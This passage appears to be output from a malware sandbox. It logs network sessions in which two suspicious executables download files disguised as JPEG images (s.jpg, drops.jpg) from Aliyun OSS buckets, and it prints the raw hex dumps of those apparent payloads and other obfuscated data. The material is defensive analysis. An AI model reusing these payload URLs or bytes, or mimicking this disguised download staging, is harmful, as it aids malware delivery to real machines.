                                                                            2025-01-15 08:02:46 UTC4096INData Raw: 23 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92
                                                                            Data Ascii: #_##V'3+f*~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{*m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
                                                                            2025-01-15 08:02:46 UTC4096INData Raw: 8e 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6
                                                                            Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
                                                                            2025-01-15 08:02:46 UTC4096INData Raw: 38 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f
                                                                            Data Ascii: 80JY9sEAOyv1|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4|4%A}bkkkkEv|sJ"KKKKD\@NKS
                                                                            2025-01-15 08:02:46 UTC4096INData Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce
                                                                            Data Ascii: (((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
                                                                            2025-01-15 08:02:46 UTC4096INData Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                                                            Data Ascii: ,$LDld=5}u]U
                                                                            2025-01-15 08:02:46 UTC4096INData Raw: 67 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed
                                                                            Data Ascii: gG<EB`."+LVpfVgUo0|\~:KbkY5xCM$8^330021228SXOBIFe-
                                                                            2025-01-15 08:02:46 UTC161INData Raw: 27 bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 e8 26 62 3c
                                                                            Data Ascii: 'VH <dMs~/rSixpGTz& dnCz|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpS&b<


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.44974339.103.20.174437276C:\Users\user\Desktop\138745635-72645747.116.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-15 08:02:47 UTC105OUTGET /s.jpg HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            User-Agent: Do
                                                                            Host: vien3h.oss-cn-beijing.aliyuncs.com
                                                                            2025-01-15 08:02:48 UTC544INHTTP/1.1 200 OK
                                                                            Server: AliyunOSS
                                                                            Date: Wed, 15 Jan 2025 08:02:48 GMT
                                                                            Content-Type: image/jpeg
                                                                            Content-Length: 8299
                                                                            Connection: close
                                                                            x-oss-request-id: 67876BA85E34143536C83EB6
                                                                            Accept-Ranges: bytes
                                                                            ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                                                                            Last-Modified: Mon, 13 Jan 2025 12:21:18 GMT
                                                                            x-oss-object-type: Normal
                                                                            x-oss-hash-crc64ecma: 692387538176721524
                                                                            x-oss-storage-class: Standard
                                                                            x-oss-ec: 0048-00000104
                                                                            Content-Disposition: attachment
                                                                            x-oss-force-download: true
                                                                            Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                                                                            x-oss-server-time: 18
                                                                            2025-01-15 08:02:48 UTC3552INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                            Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                            2025-01-15 08:02:48 UTC4096INData Raw: 06 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43
                                                                            Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy|9_;]:^8)'@/Ysq$hQ=2[C
                                                                            2025-01-15 08:02:48 UTC651INData Raw: d6 f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84
                                                                            Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji|}~


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.449755118.178.60.94437752C:\Users\user\Documents\0b1G0H.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-15 08:03:02 UTC114OUTGET /drops.jpg HTTP/1.1
                                                                            User-Agent: GetData
                                                                            Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                            Cache-Control: no-cache
                                                                            2025-01-15 08:03:02 UTC546INHTTP/1.1 200 OK
                                                                            Server: AliyunOSS
                                                                            Date: Wed, 15 Jan 2025 08:03:02 GMT
                                                                            Content-Type: image/jpeg
                                                                            Content-Length: 37274
                                                                            Connection: close
                                                                            x-oss-request-id: 67876BB62E5F2239337DCA25
                                                                            Accept-Ranges: bytes
                                                                            ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7"
                                                                            Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT
                                                                            x-oss-object-type: Normal
                                                                            x-oss-hash-crc64ecma: 9193697774326766004
                                                                            x-oss-storage-class: Standard
                                                                            x-oss-ec: 0048-00000105
                                                                            Content-Disposition: attachment
                                                                            x-oss-force-download: true
                                                                            Content-MD5: bU3rlSbzlz3g+dzpOS+Opw==
                                                                            x-oss-server-time: 13
                                                                            2025-01-15 08:03:02 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31
                                                                            Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
                                                                            2025-01-15 08:03:02 UTC4096INData Raw: 83 b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11
                                                                            Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;|6@q_^/f
                                                                            2025-01-15 08:03:02 UTC4096INData Raw: eb d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c
                                                                            Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h|
                                                                            2025-01-15 08:03:02 UTC4096INData Raw: f9 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89
                                                                            Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR|u9g39Z_?|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-*Qm[Q27Gahf*'h&<yw9
                                                                            2025-01-15 08:03:02 UTC4096INData Raw: 1d 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14
                                                                            Data Ascii: ;<=wJBDEVUV}*hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z*#i+l3y;!"#$bBoKtAq
                                                                            2025-01-15 08:03:02 UTC4096INData Raw: b2 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77
                                                                            Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
                                                                            2025-01-15 08:03:02 UTC4096INData Raw: 7d 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f
                                                                            Data Ascii: }ctABCKw4|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT*&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=*SV.c{]=bh&g}|6
                                                                            2025-01-15 08:03:02 UTC4096INData Raw: 7d 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be
                                                                            Data Ascii: }t'FCDEhNOP}bBibcd- O|lno=\{{|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~
                                                                            2025-01-15 08:03:02 UTC4096INData Raw: 39 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f
